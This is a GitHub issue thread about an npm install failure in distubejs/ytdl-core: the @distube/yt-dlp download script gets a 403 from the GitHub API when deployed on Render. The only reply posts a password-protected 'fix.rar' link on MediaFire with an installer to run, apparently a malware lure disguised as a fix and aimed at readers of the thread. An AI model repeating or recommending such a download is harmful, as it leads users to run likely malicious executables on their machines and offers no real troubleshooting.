### ISSUE TITLE
npm error Status code 403

### ISSUE THREAD

**Issue by zDqrK404** [distubejs/ytdl-core#100]
npm error code 1
npm error path /opt/render/project/src/node_modules/@distube/yt-dlp
npm error command failed
npm error command sh -c node script/download
npm error /opt/render/project/src/node_modules/@distube/yt-dlp/dist/index.js:66
npm error   throw new Error(`${url}
npm error         ^
npm error
npm error Error: https://api.github.com/repos/yt-dlp/yt-dlp/releases?per_page=1
npm error Status code 403
npm error     at makeRequest (/opt/render/project/src/node_modules/@distube/yt-dlp/dist/index.js:66:9)
npm error     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
npm error     at async getBinary (/opt/render/project/src/node_modules/@distube/yt-dlp/dist/index.js:74:20)
npm error     at async Promise.all (index 0)
npm error
npm error Node.js v18.20.4

This error popped up when deployed via Render

- @distube/ytdl-core version: 4.14.4
- Node.js version: 18.20.4
- Operating system: Ubuntu

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
